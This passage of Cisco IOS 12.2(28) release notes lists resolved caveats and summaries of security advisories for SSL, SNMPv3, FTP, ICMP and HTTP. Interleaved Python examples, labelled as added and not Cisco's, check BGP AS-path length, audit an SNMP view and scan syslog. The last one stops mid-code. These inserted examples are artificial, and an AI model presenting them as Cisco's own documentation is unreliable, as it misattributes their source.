A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsc72722

Symptoms: TCP connections that are opened through a Cisco IOS Firewall (CBAC) may not time out.

Conditions: With Cisco IOS Firewall (CBAC) enabled, the TCP idle timer for a session may be reset even by TCP packets that fail TCP inspection and are subsequently dropped. This could lead to the TCP session not timing out.

Workaround: There is no workaround.

CSCsd92405

A Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, the vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device. These vulnerabilities are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

CSCsd95616

Two crafted Protocol Independent Multicast (PIM) packet vulnerabilities exist in Cisco IOS software that may lead to a denial of service (DoS) condition. Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are available.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080924-multicast.shtml.

CSCsf04754

Multiple Cisco products contain either of two authentication vulnerabilities in the Simple Network Management Protocol version 3 (SNMPv3) feature. These vulnerabilities can be exploited when processing a malformed SNMPv3 message. These vulnerabilities could allow the disclosure of network information or may enable an attacker to perform configuration changes to vulnerable devices. The SNMP server is an optional service that is disabled by default. Only SNMPv3 is impacted by these vulnerabilities. Workarounds are available for mitigating the impact of the vulnerabilities described in this document.

The United States Computer Emergency Response Team (US-CERT) has assigned Vulnerability Note VU#878044 to these vulnerabilities.

Common Vulnerabilities and Exposures (CVE) identifier CVE-2008-0960 has been assigned to these vulnerabilities.

This advisory will be posted at http://www.cisco.com/warp/public/707/cisco-sa-20080610-snmpv3.shtml

CSCsg16908

Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.

These vulnerabilities do not apply to the IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

CSCsg40567

Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.

Conditions: This symptom is observed on a Cisco router that has the ip http secure-server command enabled.

Workaround: Disable the HTTPS server with the no ip http secure-server command.

TCP/IP Host-Mode Services

CSCek37177

The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.

This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This issue is documented as Cisco bug ID CSCek37177

There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml

CSCse05736

Symptoms: A router that is running RCP can be reloaded by a specific packet.

Conditions: This symptom is seen under the following conditions:

The router must have RCP enabled.

The packet must come from the source address of the designated system configured to send RCP packets to the router.

The packet must have a specific data content.

Workaround: Apply access lists at the edge of your network to block RCP packets and prevent spoofed RSH packets. Use another protocol, such as SCP. Use VTY ACLs.

Resolved Caveats—Cisco IOS Release 12.2(28c)

Cisco IOS Release 12.2(28c) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28c) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Miscellaneous

CSCsb26972

Symptoms: A Cisco router may experience a bus error crash.

Conditions: This symptom may be triggered by an event such as an ISDN connection.

Workaround: There is no workaround.

CSCei61732

Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.

Cisco has made free software available that includes the additional integrity checks for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.

Resolved Caveats—Cisco IOS Release 12.2(28b)

Cisco IOS Release 12.2(28b) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28b) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

IP Routing Protocols

CSCeh13489

Symptoms: A router may reset its Border Gateway Protocol (BGP) session.

Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.

Workaround: Configure the bgp maxas-limit command in such a way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path length, the prefix is rejected and the event is recorded in the log.
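As an added example (not code from the Cisco release notes), the following shows what a receiving BGP speaker does when it enforces an AS-path length ceiling like the one the bgp maxas-limit workaround configures: decode the AS_PATH attribute from the wire, compute its length, and reject and log the prefix when the limit is exceeded. The AS_PATH wire format and the length rule (AS_SET counts as one hop, AS_SEQUENCE counts one per AS) follow RFC 4271 with 2-octet AS numbers; the function names, the log wording and the sample paths are constructed for this example.

```python
"""Added example, not from the Cisco release notes: enforcing an AS-path
length limit on received BGP updates, in the spirit of bgp maxas-limit.
Wire format and length rule per RFC 4271 (2-octet ASNs); names and
sample data are constructed."""
import struct
from typing import List, Tuple

AS_SET = 1        # RFC 4271 path segment type values
AS_SEQUENCE = 2

Segment = Tuple[int, List[int]]


def parse_as_path(attr: bytes) -> List[Segment]:
    """Decode an AS_PATH attribute value into (segment_type, [asn, ...]) pairs.
    Raises ValueError on truncated or unknown segments instead of reading past
    the buffer, the kind of bounds check a receiver must make on peer input."""
    segments: List[Segment] = []
    pos = 0
    while pos < len(attr):
        if pos + 2 > len(attr):
            raise ValueError("truncated segment header")
        seg_type, count = attr[pos], attr[pos + 1]
        pos += 2
        if seg_type not in (AS_SET, AS_SEQUENCE):
            raise ValueError(f"unknown segment type {seg_type}")
        end = pos + 2 * count
        if end > len(attr):
            raise ValueError("truncated segment body")
        asns = list(struct.unpack(f"!{count}H", attr[pos:end]))
        segments.append((seg_type, asns))
        pos = end
    return segments


def as_path_length(segments: List[Segment]) -> int:
    """Path length as used for route selection: an AS_SET counts as one hop."""
    return sum(1 if seg_type == AS_SET else len(asns) for seg_type, asns in segments)


def check_update(attr: bytes, maxas_limit: int, log: List[str]) -> bool:
    """Return True if the prefix carrying this AS_PATH may be accepted.
    Paths longer than maxas_limit, and malformed paths, are rejected and the
    event is appended to the caller's log list (constructed wording)."""
    try:
        segments = parse_as_path(attr)
    except ValueError as exc:
        log.append(f"malformed AS_PATH rejected: {exc}")
        return False
    length = as_path_length(segments)
    if length > maxas_limit:
        log.append(f"AS path length {length} exceeds maxas-limit {maxas_limit}: prefix rejected")
        return False
    return True


def build_as_path(segments: List[Segment]) -> bytes:
    """Encode segments to wire format (used here only to build the samples)."""
    out = bytearray()
    for seg_type, asns in segments:
        out += bytes([seg_type, len(asns)])
        out += struct.pack(f"!{len(asns)}H", *asns)
    return bytes(out)


# Constructed sample paths: a normal 4-hop path, and a 255-hop path, the
# length at which the caveat describes the session reset.
SHORT_PATH = build_as_path([(AS_SEQUENCE, [65001, 65002, 65003]), (AS_SET, [65010, 65011])])
LONG_PATH = build_as_path([(AS_SEQUENCE, [65000 + (i % 500) for i in range(255)])])

if __name__ == "__main__":
    events: List[str] = []
    print(check_update(SHORT_PATH, 254, events), check_update(LONG_PATH, 254, events))
    print("\n".join(events))
```

The limit is applied to the computed path length rather than to the raw segment count, so a long AS_SET still counts as a single hop, which is the value a router compares against its configured maximum.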

Miscellaneous

CSCsb09190

Symptoms: A router misses an entry in its label forwarding table, which is shown in the output of the show tag-switching forwarding-table EXEC command for the missing entry and in the output of the show ip cef detail EXEC command for the prefix.

Conditions: This symptom is observed on a Cisco router that is configured for Multiprotocol Label Switching (MPLS) and that learns its routes through iBGP from redundant route reflectors (RRs) when BGP labeling is not enabled.

Workaround: There is no workaround. However, when you enter the clear ip route EXEC command for the affected prefix, the prefix is reinstalled in the label forwarding table.

Resolved Caveats—Cisco IOS Release 12.2(28a)

Cisco IOS Release 12.2(28a) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Miscellaneous

CSCsa81379

NetFlow Feature Acceleration has been deprecated and removed from Cisco IOS. The global command ip flow-cache feature-accelerate will no longer be recognized in any IOS configuration.

If your router configuration does not currently contain the command ip flow-cache feature-accelerate, this change does not affect you.

The removal of NetFlow Feature Acceleration does not affect any other aspects of NetFlow operation, for example access-list processing. The features are separate and distinct.

Cisco Express Forwarding (CEF) supersedes the deprecated NetFlow Feature Acceleration.

Additionally, the following MIB objects and OIDs have been deprecated and removed from the NetFlow MIB (CISCO-NETFLOW-MIB):

cnfFeatureAcceleration 1.3.6.1.4.1.9.9.99999.1.3
cnfFeatureAccelerationEnable 1.3.6.1.4.1.9.9.99999.1.3.1
cnfFeatureAvailableSlot 1.3.6.1.4.1.9.9.99999.1.3.2
cnfFeatureActiveSlot 1.3.6.1.4.1.9.9.99999.1.3.3
cnfFeatureTable 1.3.6.1.4.1.9.9.99999.1.3.4
cnfFeatureEntry 1.3.6.1.4.1.9.9.99999.1.3.4.1
cnfFeatureType 1.3.6.1.4.1.9.9.99999.1.3.4.1.1
cnfFeatureSlot 1.3.6.1.4.1.9.9.99999.1.3.4.1.2
cnfFeatureActive 1.3.6.1.4.1.9.9.99999.1.3.4.1.3
cnfFeatureAttaches 1.3.6.1.4.1.9.9.99999.1.3.4.1.4
cnfFeatureDetaches 1.3.6.1.4.1.9.9.99999.1.3.4.1.5
cnfFeatureConfigChanges 1.3.6.1.4.1.9.9.99999.1.3.4.1.6

Resolved Caveats—Cisco IOS Release 12.2(28)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(28). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(28). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCee20816

Symptoms: A system used for reverse connections, such as a console server or other "milking machine" applications, may unexpectedly restart due to a bus error.

Conditions: The conditions under which this occurs are not well understood, but it is likely that frequent, short-lived connections are more likely to cause the problem than environments where connections are either long-lived or rarely opened and closed.

Workaround: There is no workaround.

CSCee84611

Symptoms: An NTP broadcast client may fail to synchronize with an NTP broadcast server if the server cannot be reached from the client.

Conditions: This symptom is observed in Cisco IOS interim Release 12.2(12.11)T or a later release, including Release 12.3. However, the symptom may also occur in other releases.

Workaround: Ensure that the server can be reached from the client.

CSCeg15044

Symptoms: Although there are free tty lines, you cannot make a Telnet connection and a "No Free TTYs error" message is generated.

Conditions: This symptom is observed when there are simultaneous Telnet requests.

Workaround: There is no workaround.

IBM Connectivity

CSCef95672

Symptoms: DLSw does not function when an SDLC station has the sdlc role prim-xid-poll command enabled.

Conditions: This symptom is observed on a Cisco router that runs Cisco IOS Release 12.3(10). The DLSw circuit is established, but the router does not send the XID to the SDLC station.

Workaround: There is no workaround.

CSCeg05690

Symptoms: A software-forced crash may occur on a Cisco router that is configured with a Bisync Serial Tunnel (BSTUN).

Conditions: This symptom is observed when line flaps occur on the asynchronous line that is attached to the BSTUN while the router attempts to forward packets via the asynchronous line.

Workaround: Ensure that the asynchronous line does not flap.

Interfaces and Bridging

CSCeg03185

Symptoms: A few permanent virtual circuits (PVCs) go into a stuck state causing OutPktDrops on a Cisco 7200 router.

Conditions: This symptom occurs on a Cisco 7200 router running Cisco IOS Release 12.2(26) with a PA-A3-T3 ATM interface. The symptom may also occur in other releases.

Workaround: Remove and re-apply the PVC statement.

CSCeg73645

Symptoms: A Versatile Interface Processor 2-50 (VIP2-50) crashes because of a Cybus error with DMA receive errors.

Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.1 and that is configured with a PA-2FE that is installed in a VIP2-50. The symptom may also occur in other releases.

Workaround: There is no workaround.

CSCin84694

Symptoms: On a Cisco 7x00 series that runs Cisco IOS Release 12.3 and that is equipped with an ATM PA-A3 port adapter, the SAR chip of the port adapter may crash or the interface may become stuck.

Conditions: This symptom is observed when there is a high-traffic load on the ATM PA-A3 port adapter and when many VCs are created, deleted, and modified continuously. The symptom may also occur in other releases.

Workaround: There is no workaround.

IP Routing Protocols

CSCef60659

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCef93215

Symptoms: A router that is configured for OSPF may reload unexpectedly and reference the "ospf_build_one_paced_update" process.

Conditions: This is observed on a Cisco router that has a mixture of LSAs (of type 5 and 11) that travel throughout an autonomous system and LSAs (of any type other than type 5 and 11) that travel within a particular OSPF area. The symptom may occur at any time without any specific changes or configuration and is not specifically related to any type of LSA.

Workaround: There is no workaround.

Further Problem Description: The symptom is very unlikely to occur. The symptom does not occur on a router that has exclusively stub areas and NSSA areas. The symptom may occur when a router does not have exclusively stub areas and NSSA areas.

CSCef97573

Symptoms: A router may reload with a bus error exception, the crashinfo file shows an address error (a load or instruction fetch), and there is a spurious access in the crashinfo file.

Conditions: These symptoms are observed on a Cisco router that performs NAT on H.323 voice traffic.

Workaround: There is no workaround.

CSCsa51150

Symptoms: When Network Address Translation (NAT) is configured, TCP translations do not time out properly when the TCP session is closed in a normal way.

Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 and that integrates the fix for CSCed93170. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCed93170.

Workaround: Lower the global NAT translation timeout period with the ip nat translation tcp-timeout seconds command.

CSCsa59600

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

ISO CLNS

CSCee83712

Symptoms: A 60-second blackhole of an MPLS VPN flow (or any other flow to BGP) may occur when an IS-IS link fails or the metric of the IS-IS link is modified.

Conditions: This symptom is observed on a Cisco platform that functions as a PE router and that is configured for BGP when the following conditions are present:

The PE performs load balancing across two links, which may be two links with the same metric to another router or two links to two different routers.

The ip fast-convergence command is enabled as part of the router isis command on the PE router.

Workaround: Disable the ip fast-convergence command. This workaround can only be applied if the platform is part of a network that does not target a 50-msec convergence time. If this is not an option, there is no workaround.

Miscellaneous

CSCdz84448

Symptoms: Spurious memory accesses may occur on a router, and the router may reboot.

Conditions: This symptom is observed on a Cisco router when you poll the cbQosREDClassStatsTable of the CISCO-CLASS-BASED-QOS-MIB. The symptom is platform-independent. The spurious memory accesses may be reproduced when polling the above-mentioned table via Simple Network Management Protocol (SNMP).

Workaround: Prevent the router from answering to queries on the cbQosREDClassStatsTable by implementing the following SNMP view in the router configuration:

snmp-server view qos internet included

snmp-server view qos 1.3.6.1.4.1.9.9.166.1.20.1 excluded

snmp-server community string view qos ro
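To see why the three lines above are enough, here is an added example (not code from the Cisco release notes) that evaluates OIDs against the qos view. It applies the view-subtree rule from RFC 3415, under which the most specific matching subtree decides and an excluded subtree hides everything beneath it; this example assumes an IOS view resolves the same way. The configuration text and the cbQosREDClassStatsTable OID come from the workaround; the function names and the sample instance OIDs are constructed.

```python
"""Added example, not from the Cisco release notes: checking which OIDs an
SNMP view exposes, using the longest-matching-subtree rule of RFC 3415.
Config lines and the excluded OID are from the caveat's workaround; function
names and sample instance OIDs are constructed."""
from typing import Dict, List, Optional, Tuple

# Names IOS accepts in place of a numeric subtree; only the ones needed here.
NAMED_SUBTREES = {"internet": "1.3.6.1", "iso": "1"}

OID = Tuple[int, ...]
ViewEntry = Tuple[OID, bool]   # (subtree, included?)


def oid_to_tuple(oid: str) -> OID:
    return tuple(int(arc) for arc in oid.strip(".").split("."))


def parse_view(config: str, view_name: str) -> List[ViewEntry]:
    """Collect the (subtree, included) entries of one named view from config text.
    Lines of other views, and the community line, are ignored."""
    entries: List[ViewEntry] = []
    for line in config.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[:3] == ["snmp-server", "view", view_name]:
            subtree = NAMED_SUBTREES.get(parts[3], parts[3])
            entries.append((oid_to_tuple(subtree), parts[4] == "included"))
    return entries


def oid_permitted(view: List[ViewEntry], oid: str) -> bool:
    """True if the view exposes this OID: the longest matching subtree wins,
    and an OID that matches no entry at all is not visible."""
    target = oid_to_tuple(oid)
    best: Optional[ViewEntry] = None
    for subtree, included in view:
        matches = target[: len(subtree)] == subtree
        if matches and (best is None or len(subtree) > len(best[0])):
            best = (subtree, included)
    return best is not None and best[1]


def audit_view(view: List[ViewEntry], oids: List[str]) -> Dict[str, bool]:
    """Map each OID of interest to whether the view lets a poller reach it."""
    return {oid: oid_permitted(view, oid) for oid in oids}


# The workaround from the caveat, as it would appear in the running config.
WORKAROUND_CONFIG = """\
snmp-server view qos internet included
snmp-server view qos 1.3.6.1.4.1.9.9.166.1.20.1 excluded
snmp-server community string view qos ro
"""

QOS_VIEW = parse_view(WORKAROUND_CONFIG, "qos")

# cbQosREDClassStatsTable sits under 1.3.6.1.4.1.9.9.166.1.20.1 (from the
# caveat); the instance suffixes below are constructed.
RED_STATS_INSTANCE = "1.3.6.1.4.1.9.9.166.1.20.1.1.1.1234.5678"
SYS_DESCR = "1.3.6.1.2.1.1.1.0"                    # sysDescr.0, MIB-II
OTHER_CBQOS = "1.3.6.1.4.1.9.9.166.1.1.1.1.1.1"    # a different cbQos table

if __name__ == "__main__":
    for oid, ok in audit_view(QOS_VIEW, [SYS_DESCR, OTHER_CBQOS, RED_STATS_INSTANCE]).items():
        print(f"{oid}: {'visible' if ok else 'blocked'}")
```

Running the audit before and after applying the workaround on a lab copy of the configuration confirms that only the RED statistics subtree is hidden while the rest of the cbQos MIB and MIB-II stay pollable.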

CSCeb07656

Symptoms: There is no connectivity over an MLP link.

Conditions: This symptom is observed on a Cisco Catalyst 6000 series that is configured with a FlexWAN in which a port adapter is installed. MLP is configured on an interface of the port adapter.

Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the affected interface.

CSCeb80992

Symptoms: A router may reload unexpectedly because of a bus error when access control lists (ACL) counters are sent from a line card or network module to the Route Processor (RP).

Conditions: This symptom is observed when the ACL number is in the expanded range (that is, from 1300 to 1999 or from 2000 to 2699). Note that the symptom does not occur when named ACLs are used.

Workaround: There is no workaround.

CSCed00033

Symptoms: When an ATM PVC bounces, it fails to come back up and remains in the DOWN/UNVERIFIED state.

Conditions: This symptom occurs when an ATM line card is connected to an ATM switch, when the ATM PVC is managed by OAM, and when the frequency of the OAM F5 loopback cells is set to 0 via the oam-pvc manage 0 command.

Workaround: Reactivate the PVC by entering the shutdown command followed by the no shutdown command on the PVC.

Alternate Workaround: Disable OAM management.

CSCed81317

Symptoms: When an import map is configured on a VPN Routing/Forwarding (VRF) instance, the CE-learned routes are filtered out, preventing them from appearing in the VRF routing table.

Conditions: This symptom is observed when the import map word command is configured as part of the VRF configuration. Note that eBGP routes are not filtered out.

Workaround: There is no workaround.

CSCee70591

Symptoms: A Cisco 7500 series T3 port adapter (PA-2T3+) may not provide a two-second delay before bringing down the T3 controller.

Conditions: This symptom is observed when an alarm as defined in the ANSI T1.231 specification occurs.

Workaround: There is no workaround.

CSCef04072

Symptoms: A learned RIP default route from a next hop router may not be removed from the routing table when the next hop router goes down.

Conditions: This symptom is observed on a router that runs Cisco IOS Release 12.1 or Release 12.2 and occurs only when the router runs both EIGRP and RIP simultaneously. The symptom may also occur in other releases.

Workaround: There is no workaround.

CSCef44699

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages
2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks
3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCef73120

Symptoms: When you enter the dsu bandwidth kbps command, the router may not change the DSU bandwidth.

Conditions: This symptom is observed on a Cisco router that is configured with an E3 serial port adapter.

Workaround: There is no workaround.

CSCeg00481

Symptoms: A router fails to receive the Integrated Local Management Interface (ILMI) prefix from the switch side.

Conditions: This symptom occurs during the initial negotiation of ILMI parameters. The output of show atm ilmi-status command does not show the configured ILMI prefix.

Workaround: There is no workaround.

CSCeg03153

Symptoms: The ifAdminStatus MIB shows that subinterfaces are up when the main interface is shut down. This situation prevents SNMP from monitoring the proper status of the subinterfaces.

Conditions: This symptom is observed when an ATM main interface is shut down but its subinterfaces are not.

Workaround: Do not use the ifAdminStatus MIB. Rather, use the ifOperStatus MIB.

Further Problem Description: The fix for this caveat ensures that when the main interface is shut down, the ifAdminStatus MIB does show that the subinterfaces are down too, whether or not the individual subinterfaces have been shut down.

CSCeg16622

Symptoms: A Cisco router that is configured for SNASw may reload because of a bus error.

Conditions: This symptom is observed when the downstream port is configured for VDLC (DLSw). The symptom is platform-independent and is more likely to occur in a large, busy SNASw environment.

Workaround: There is no workaround.

CSCeg19008

Symptoms: A PE router that is configured for MPLS may reload.

Conditions: This symptom is observed when an MPLS adjacency is freed while the router performs label imposition on incoming IP packets.

Workaround: There is no workaround.

CSCeg23051

Symptoms: A VIP may crash at "tagsw_flow_get".

Conditions: This symptom is observed on a Cisco 7500 series that is configured for egress NetFlow when any of the following events occur:

You toggle between the ip cef distributed global configuration command and the ip cef global configuration command.

You enter the clear cef linecard EXEC command.

You toggle between the tag-switching ip global configuration or interface configuration command and the no tag-switching ip global configuration or interface configuration command.

You toggle between the mpls netflow egress interface configuration command and the no mpls netflow egress interface configuration command.

If a VIP in one slot crashes, another VIP in another slot may crash because of caveat CSCeg23051 or caveat CSCdx14343.

Workaround: There is no workaround.

CSCin83377

Symptoms: After a router reloads, a permanent virtual circuit (PVC) configuration may be lost from a virtual circuit (VC).

Conditions: The symptom is observed on a Cisco 7xxx series router when the VC is configured under an IMA-group interface of a PA-A3-8T1IMA or PA-A3-8E1IMA port adapter.

Workaround: Save the configuration to disk or in bootflash. After the router has reloaded and come up, copy the configuration from the disk or bootflash to the running configuration.

Wide-Area Networking

CSCsa49019

Symptoms: A memory leak may occur in the "Multilink Events" process, which can be seen in the output of the show memory summary command:

0x60BC47D0 0000000024 0000000157 0000003768 MLP bundle name
0x60BC47D0 0000000028 0000000003 0000000084 MLP bundle name
0x60BC47D0 0000000044 0000000001 0000000044 MLP bundle name
0x60BC47D0 0000000048 0000000001 0000000048 MLP bundle name
0x60BC47D0 0000000060 0000000001 0000000060 MLP bundle name
0x60BC47D0 0000000064 0000000013 0000000832 MLP bundle name
0x60BC47D0 0000000068 0000000008 0000000544 MLP bundle name
0x60BC47D0 0000000072 0000000001 0000000072 MLP bundle name
0x60BC47D0 0000000076 0000000001 0000000076 MLP bundle name
0x60BC47D0 0000000088 0000000018 0000001584 MLP bundle name

Conditions: This symptom is observed when two interfaces are configured in the same multilink group or are bound to the same dialer profile.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(27c)

Cisco IOS Release 12.2(27c) is a rebuild release for Cisco IOS Release 12.2(27). The caveats in this section are resolved in Cisco IOS Release 12.2(27c) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or a crash may be seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable the HTTP server with the no ip http server command.

CSCsc64976

A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, will be passed to the browser requesting the page. This HTML code could be interpreted by the client browser and potentially execute malicious commands against the device or other possible cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content in which HTML commands have been injected.

Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml

CSCsj44081

Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.

Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.

The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestamp:
May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error

The error message is then followed by a traceback.

It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.

Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.
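Because this message is a new, early indicator rather than a crash, it is worth alerting on from collected syslog. The following is an added example (not Cisco code) that scans IOS-style syslog lines, flags %DATACORRUPTION-1-DATAINCONSISTENCY and attaches the traceback that follows it; the sample log lines are constructed, and the line format (optional sequence number, timestamp, "%FACILITY-SEVERITY-MNEMONIC: text", traceback on the same or the next line) is an assumption.

```python
"""Flag %DATACORRUPTION-1-DATAINCONSISTENCY messages in Cisco IOS syslog output.

Added example, not Cisco code. It assumes IOS-style syslog lines: an optional
sequence number, a timestamp, then "%FACILITY-SEVERITY-MNEMONIC: text", with
the traceback either on the same line or on a following "-Traceback=" line.
"""
import re
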